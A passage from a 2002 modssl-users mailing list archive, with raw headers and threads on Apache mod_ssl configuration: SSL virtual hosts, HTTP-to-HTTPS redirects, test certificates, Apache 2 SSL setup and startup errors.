> work across both. If you want to insure that users are not able
> to open this connection via 80, then do not include this 
> port in your listen statements in http.conf.
> 
> There are many different ways to deal with this. See the following
> for more details.
> 
> Binding ports and the listen option:
> http://httpd.apache.org/docs-2.0/bind.html
> 
> Authentication overview.
> http://httpd.apache.org/docs-2.0/howto/auth.html
> 
> Users via a password file:
> http://httpd.apache.org/docs-2.0/howto/auth.html#gettingitworking
> 
> Users via a groups file:
> http://httpd.apache.org/docs-2.0/howto/auth.html#lettingmorethanonepersonin
> 
> On Fri, 8 Nov 2002, Robert Lagana wrote:
> 
> > Hello,
> i>  
> > Using mod_ssl .. on Apache .. I would like to secure two directories..
> >  
> > https://www.domain.com/homedir  
> >  
> > https://www.domain.com/homedir2  
> >  
> > Now if user go to http://www.domain.com   will
> users
> > get a pop up saying that SSL is required?
> >  
> > Is this just a matter of having Port 80 and Port 443 enabled?
> >  
> > Do I set these directories up as virtual hosts?
> >  
> > Is there a link someone can provided that explains this?
> >  
> > Thanks,
> > Rob
> >  
> >  
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 22:15:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18282; Fri, 8 Nov 2002 22:14:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA18273; Fri, 8 Nov 2002 22:13:52 +0100 (MET)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA12183
	for ; Fri, 8 Nov 2002 16:13:17 -0500
Date: Fri, 8 Nov 2002 16:13:17 -0500 (EST)
From: "R. DuFresne" 
To: "modssl-users@modssl.org" 
Subject: Re: Segmentaion faults
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


For one, all you source is dated, and vulnerable.  I'd update first thing.

Thanks,

Ron DuFresne

On Sat, 9 Nov 2002, Avinash S wrote:

> 
> Hi,
> 
> I am using Red Hat 7.3 with apache-1.3.26, mod_ssl-2.8.7-4 and
> openssl-0.9.6b-18. Apache has crashed three times in last week with the
> following error in apache's error_log.
> 
> [Mon Nov  4 15:58:07 2002] [error] [client 147.213.65.178] client sent
> HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
> [Mon Nov  4 15:58:16 2002] [error] mod_ssl: SSL handshake failed (server
> www.nonstock.com:443, client 147.213.65.178) (OpenSSL library error
> follows)
> [Mon Nov  4 15:58:16 2002] [error] OpenSSL:
> error:1406908F:lib(20):func(105):reason(143)
> [Mon Nov  4 15:58:17 2002] [notice] child pid 14246 exit signal
> Segmentation fault (11)
> 
> Please help.
> 
> Thanks in advance
> Avinash.
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  9 18:36:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA07557; Sat, 9 Nov 2002 18:35:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.allinterior.com id SAA07522; Sat, 9 Nov 2002 18:34:28 +0100 (MET)
Received: from icarrion (unknown [64.105.192.205])
	by mail.allinterior.com (Postfix) with ESMTP id 97B4C1DB410
	for ; Fri,  8 Nov 2002 14:37:27 -0500 (EST)
From: "Irving Carrion" 
To: 
Subject: RE: mod-ssl Virtual Hosts
Date: Fri, 8 Nov 2002 14:59:35 -0500
Organization: All Interior Supply
Message-ID: <022301c28761$6d4d86d0$820000c0@icarrion>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Irving Carrion" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for the reply.

According to the docs the following should work...

   
   ... standard directives such as DocumentRoot, Logfile, ErrorLog here
...
   
   SSLEngine on
   SSLCertificateFile    /etc/apache/ssl.crt/server.crt
   SSLCertificateKeyFile /etc/apache/ssl.key/server.key
   SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   
   

Now when I add another one like this 

   
   ... standard directives such as DocumentRoot, Logfile, ErrorLog here
...
   
   SSLEngine on
   SSLCertificateFile    /etc/apache/ssl.crt/server.crt
   SSLCertificateKeyFile /etc/apache/ssl.key/server.key
   SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   
   

Only the first domain works and the second does not.

So your saying to use ip based virtual host like this... 

   
   ... standard directives such as DocumentRoot, Logfile, ErrorLog here
...
   
   SSLEngine on
   SSLCertificateFile    /etc/apache/ssl.crt/server.crt
   SSLCertificateKeyFile /etc/apache/ssl.key/server.key
   SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   
   


Is this correct?

Thanks!
IRV




-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
Sent: Friday, November 08, 2002 2:05 PM
To: modssl-users@modssl.org
Subject: Re: mod-ssl Virtual Hosts

a) you could try surfing the archives of this list since an arguable 
10% of the traffic is either this exact question or directly relates to 
it.
b) you could use different ports
c) you could use different IPs.  they're not *that* rare .. and .. it 
could be sanely argued that if you've got content important enough to 
protect using SSL, the cost of "using up" an IP is just part of the 
cost of making that _important_ information accessible.

-dsp


On Friday, Nov 8, 2002, at 18:30 Europe/London, Irving Carrion wrote:

> Hello All!
>
> Just recently I was able to get this mod-ssl library working on
Apache.
> It is working just fine.  Much thanks to the developer team.
>
> Anyway my question is...
>
> Currently I use name-based virtual hosts for all of our websites.
>
> http://domain1.com
> http://domain2.com
>
> We would like to have the ability to get each domain a https address
as
> well like...
>
> https://domain1.com
> https://domain2.com
>
> What would be the best method of tackling this, since mod-ssl doesn't
> support name-based virtual host?
>
> I've thought of using IP Based virtual host, but there isn't enough
> static ip's to go around.  I've also thought of using
> proxypass/proxyreverse to point it to an internal static ip.  Am I on
> target with this?
>
> I would really appreciate any help or suggestions ANYONE can provide.
>
> Thanks!
> IRV
>
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  9 18:52:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA08463; Sat, 9 Nov 2002 18:51:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id SAA08449; Sat, 9 Nov 2002 18:50:19 +0100 (MET)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c58line174.dialup3.ctm.net [202.175.44.175])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id XAA15398;
	Sat, 9 Nov 2002 23:11:24 +0800
Message-ID: <3DCD2A33.4E7A3DBD@ita.org.mo>
Date: Sat, 09 Nov 2002 23:30:59 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
Subject: How to find secret key with plaintext on Simply DES
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Can you help me about the title ?

Thank a lots.

Edward.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  9 18:53:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA08484; Sat, 9 Nov 2002 18:52:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id SAA08462; Sat, 9 Nov 2002 18:51:23 +0100 (MET)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c57line214.dialup3.ctm.net [202.175.43.215])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id BAA15559;
	Sun, 10 Nov 2002 01:30:41 +0800
Message-ID: <3DCD4AD9.6B9B73B4@ita.org.mo>
Date: Sun, 10 Nov 2002 01:50:17 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: mod_ssl , OpenSSL 
Subject: [Fwd: How to find secret key with plaintext on Simply DES]
Content-Type: multipart/mixed;
 boundary="------------50139CAAA1DDB1A5D208B6FB"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------50139CAAA1DDB1A5D208B6FB
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------50139CAAA1DDB1A5D208B6FB
Content-Type: message/rfc822
Content-Disposition: inline

X-Mozilla-Status2: 00000000
Message-ID: <3DCD2A33.4E7A3DBD@ita.org.mo>
Date: Sat, 09 Nov 2002 23:30:59 +0800
From: EdwardSPL@ita.org.mo
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
Subject: How to find secret key with plaintext on Simply DES
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello,

Can you help me about the title ?

Thank a lots.

Edward.


--------------50139CAAA1DDB1A5D208B6FB--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov 10 08:27:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA01115; Sun, 10 Nov 2002 08:26:33 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id IAA01085; Sun, 10 Nov 2002 08:26:02 +0100 (MET)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c58line46.dialup3.ctm.net [202.175.44.47])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id PAA23237;
	Sun, 10 Nov 2002 15:05:21 +0800
Message-ID: <3DCE09C7.8DF7B6FC@ita.org.mo>
Date: Sun, 10 Nov 2002 15:24:55 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: mod_ssl , OpenSSL 
Subject: Make CA for WebServer ( Apache )
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

How to create CA ( invalid: NOT real ) for Web Server ( Apache ) ?

Thank for your help !

Edward.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov 10 19:30:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03609; Sun, 10 Nov 2002 19:29:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id TAA03493; Sun, 10 Nov 2002 19:28:17 +0100 (MET)
Received: from localhost ([127.0.0.1] helo=it0033.it-action.com)
	by mx02.itaction.net with esmtp (Exim 4.05)
	id 18AwoZ-0003X8-00
	for modssl-users@modssl.org; Sun, 10 Nov 2002 18:28:07 +0000
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H5DHYU00.NGW for ; Sun, 10 Nov 2002
          18:28:06 +0000 
Message-ID: <3DCEA533.4030604@itaction.co.uk>
Date: Sun, 10 Nov 2002 18:28:03 +0000
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Securing directories
References: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'd set these up as virtual hosts - the essence of what you want to do 
here is to make http://www.domain.com/ return different information than 
https://www.domain.com.

Having done that (by following the links in the other reply you got) you 
then will need to set up what you want to happen on the http side of 
things - there is no automatic pop-up as you were asking for.

What many do is simply configure http to do a redirect to https, like this:

Redirect /    https://www.domain.com/

or you can just put up a page with a link to https and explanatory text 
- which is often a good way of doing it so they have something to look 
at for explanation if their SSL client is not compatible with your site 
for example.

-PeterV.

Robert Lagana wrote:

> Hello,
>  
> Using mod_ssl .. on Apache .. I would like to secure two directories..
>  
> https://www.domain.com/homedir
>  
> https://www.domain.com/homedir2
>  
> Now if user go to http://www.domain.com will users get a pop up saying 
> that SSL is required?
>  
> Is this just a matter of having Port 80 and Port 443 enabled?
>  
> Do I set these directories up as virtual hosts?
>  
> Is there a link someone can provided that explains this?
>  
> Thanks,
> Rob
>  
>  


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 00:31:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA11794; Mon, 11 Nov 2002 00:30:35 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pikababy.gropep.com.au id AAA11721; Mon, 11 Nov 2002 00:29:22 +0100 (MET)
Received: from gropep.com.au (dhcp-69.gropep.com.au [150.101.50.69])
	by pikababy.gropep.com.au (8.11.6/8.11.6) with ESMTP id gAANV8P81006;
	Mon, 11 Nov 2002 10:01:08 +1030 (CST)
	(envelope-from danielm@gropep.com.au)
Message-ID: <3DCEEBA3.1070309@gropep.com.au>
Date: Mon, 11 Nov 2002 09:58:35 +1030
From: Daniel Moore 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: OpenSSL 
Subject: Re: Make CA for WebServer ( Apache )
References: <3DCE09C7.8DF7B6FC@ita.org.mo>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Moore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It's in the mod ssl INSTALL file...
Basically it's an added step when you make apache...

--from readme file...

$ cd apache_1.3.x                                                  ALL
$ SSL_BASE=../openssl-0.9.x \                                      ALL
EAPI_MM=../mm-1.1.x \                                       OPTIONAL
./configure \                                                    ALL
--enable-module=ssl \                                        ALL
--prefix=/path/to/apache \                                   ALL
[--enable-shared=ssl] \                                  OPTIONAL
[--disable-rule=SSL_COMPAT] \                            OPTIONAL
[--enable-rule=SSL_SDBM] \                               OPTIONAL
[--enable-rule=SSL_EXPERIMENTAL] \                       OPTIONAL
[--enable-rule=SSL_VENDOR] \                             OPTIONAL
[...more APACI options...]                               OPTIONAL
$ make                                                             ALL
$ make certificate                                            OPTIONAL
$ make install                                                OPTIONAL
$ cd ..  

Daniel.

EdwardSPL@ita.org.mo wrote:

>Hello,
>
>How to create CA ( invalid: NOT real ) for Web Server ( Apache ) ?
>
>Thank for your help !
>
>Edward.
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 03:35:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA16156; Mon, 11 Nov 2002 03:34:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marula.mweb.co.zw id DAA16147; Mon, 11 Nov 2002 03:33:23 +0100 (MET)
Received: from chris.mweb.co.zw ([196.2.68.250]:4490 helo=kudzu.mweb.co.zw)
	by marula.mweb.co.zw with esmtp (Exim 4.05)
	id 18B4O1-0004m9-00
	for modssl-users@modssl.org; Mon, 11 Nov 2002 04:33:14 +0200
Message-Id: <5.1.0.14.2.20021111043454.03155fb0@pop3.mweb.co.zw>
X-Sender: kiri@pop3.mweb.co.zw
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 11 Nov 2002 04:35:24 +0200
To: modssl-users@modssl.org
From: Christopher Chaduka 
Subject: Apache 2 +SSL
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Chaduka 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I searched through some archives and found out Apache 2 comes with mod_ssl 
code included, and that to enable SSL/TLS support in Apache 2, one has to 
compile OpenSSL first, then compile Apache 2 and --with-ssl=/path/to/openssl
I did exactly that. Isn't the default configuration file I get supposed to 
have some SSL directives in there? Am I brain dead? What am I missing?


--

Christopher Chaduka
Webmaster/Systems Administrator
Technical Department
M-Web Zimbabwe
Tel: +263 4 253333 Fax: +263 4 708055
Mobile: +263 11 600994
http://www.mweb.co.zw

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 03:55:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA16464; Mon, 11 Nov 2002 03:54:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marula.mweb.co.zw id DAA16456; Mon, 11 Nov 2002 03:53:46 +0100 (MET)
Received: from chris.mweb.co.zw ([196.2.68.250]:4523 helo=kudzu.mweb.co.zw)
	by marula.mweb.co.zw with esmtp (Exim 4.05)
	id 18B4hk-0004ra-00
	for modssl-users@modssl.org; Mon, 11 Nov 2002 04:53:37 +0200
Message-Id: <5.1.0.14.2.20021111045502.03048f50@pop3.mweb.co.zw>
X-Sender: kiri@pop3.mweb.co.zw
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 11 Nov 2002 04:55:47 +0200
To: modssl-users@modssl.org
From: Christopher Chaduka 
Subject: Re: Apache 2 +SSL
In-Reply-To: <5.1.0.14.2.20021111043454.03155fb0@pop3.mweb.co.zw>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Chaduka 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Aaaaaah, got it. Apache 2 comes with mod_ssl code. For those who might be 
in my situation, read this doc:

http://www.apacheworld.org/ty24/site.chapter17.html

Cheers!

Kiri

At 04:35 11-11-02 +0200, you wrote:
>I searched through some archives and found out Apache 2 comes with mod_ssl 
>code included, and that to enable SSL/TLS support in Apache 2, one has to 
>compile OpenSSL first, then compile Apache 2 and --with-ssl=/path/to/openssl
>I did exactly that. Isn't the default configuration file I get supposed to 
>have some SSL directives in there? Am I brain dead? What am I missing?
>
>
>--
>
>Christopher Chaduka
>Webmaster/Systems Administrator
>Technical Department
>M-Web Zimbabwe
>Tel: +263 4 253333 Fax: +263 4 708055
>Mobile: +263 11 600994
>http://www.mweb.co.zw
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 03:57:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA16553; Mon, 11 Nov 2002 03:56:29 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id DAA16488; Mon, 11 Nov 2002 03:55:22 +0100 (MET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 3721F2BB16; Sun, 10 Nov 2002 19:46:59 -0800 (PST)
Date: Sun, 10 Nov 2002 19:46:59 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Apache 2 +SSL
Message-ID: <20021111034659.GC31600@rawbyte.com>
References: <5.1.0.14.2.20021111043454.03155fb0@pop3.mweb.co.zw>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5.1.0.14.2.20021111043454.03155fb0@pop3.mweb.co.zw>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


You can checkout a chapter I put at
http://www.apacheworld.org/ty24/site.chapter17.html 
for detailed explanation on how to get SSL working with Apache 2,
including a conf snippet with the minimum set of directives to enable SSL

Cheers

Daniel

> I searched through some archives and found out Apache 2 comes with mod_ssl 
> code included, and that to enable SSL/TLS support in Apache 2, one has to 
> compile OpenSSL first, then compile Apache 2 and --with-ssl=/path/to/openssl
> I did exactly that. Isn't the default configuration file I get supposed to 
> have some SSL directives in there? Am I brain dead? What am I missing?
> 
> 
> --
> 
> Christopher Chaduka
> Webmaster/Systems Administrator
> Technical Department
> M-Web Zimbabwe
> Tel: +263 4 253333 Fax: +263 4 708055
> Mobile: +263 11 600994
> http://www.mweb.co.zw
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 04:44:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA17919; Mon, 11 Nov 2002 04:43:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from eagle.cgnet.ca id EAA17914; Mon, 11 Nov 2002 04:42:36 +0100 (MET)
Received: from blackbird.cgnet.ca ([192.168.29.3] ident=mail)
	by eagle.cgnet.ca with esmtp (Exim 3.35 #1 (Debian))
	id 18B5T2-0002YX-00
	for ; Sun, 10 Nov 2002 22:42:28 -0500
Received: from chris (helo=localhost)
	by blackbird.cgnet.ca with local-esmtp (Exim 3.35 #1 (Debian))
	id 18B5Sw-0006Ah-00
	for ; Sun, 10 Nov 2002 22:42:22 -0500
Date: Sun, 10 Nov 2002 22:42:22 -0500 (EST)
From: Chris Gorman 
To: 
Subject: Inability to force https rewrite before password authentication
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Gorman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

I have a strange problem here and was wondering if anyone had a solution.
I'm looking to perform a rewrite to https then require the user submit a
username and password.  The idea behind this is that the username and
password are submitted encrypted rather than in plain text.

First off version information
Apache
Server version: Apache/1.3.26 (Unix)
Mod_SSL
2.8.9 (debian 2.8.9-2.1)

I looked at Ralf's presentation from apachecon2000 (ref
http://www.modssl.org/docs/apachecon2000/slide-021-n.html ) which does
have a recipie for what I am looking to accomplish.  The only problem I
have is it doesn't seem to work for me.  The password authentication
happens before the url redirection which isn't desireable in this case.

My configuration

/subdir">
    Options Indexes FollowSymLinks
    AllowOverride All
    RewriteEngine        on
    RewriteCond          %{REMOTE_ADDR} !^192\.168\.1\.[0-9]+$
    RewriteCond          %{HTTPS} !=on
    RewriteRule          ^/(.*) https://%{SERVER_NAME}/subdir/$1 [R,L]
    SSLOptions +StrictRequire
    SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
    Satisfy any
    Order deny,allow
    deny from all
    allow from 192.168.1.0/255.255.255.0
    AuthName "Restricted Access"
    AuthType Basic
    AuthUserFile /etc/apache/htpasswd
    Require valid-user


Any ideas or suggestions on how I would overcome this obstacle, or reverse
the order of directive processing so the rewrite happens first?

Thanks

Chris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 12:08:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA00269; Mon, 11 Nov 2002 12:07:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA00252; Mon, 11 Nov 2002 12:07:02 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 153F84CE61C; Mon, 11 Nov 2002 12:07:05 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E0A852869E; Mon, 11 Nov 2002 12:05:23 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ariworld.com id GAA20648; Mon, 11 Nov 2002 06:31:03 +0100 (MET)
Received: from asen [203.196.132.237] by ariworld.com
  (SMTPD32-6.06) id A1539AC018A; Mon, 11 Nov 2002 11:04:11 +0530
From: "Atanu Sen" 
To: 
Subject: SSL Error
Date: Mon, 11 Nov 2002 11:02:28 +0530
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Atanu Sen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am facing this error when I start apache. I have followed all the required
steps. Can anyone help.
[Mon Nov 11 10:57:44 2002] [error] mod_ssl: Init: Failed to generate
temporary 5
12 bit RSA private key


Atanu.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 11 13:44:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA04423; Mon, 11 Nov 2002 13:43:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
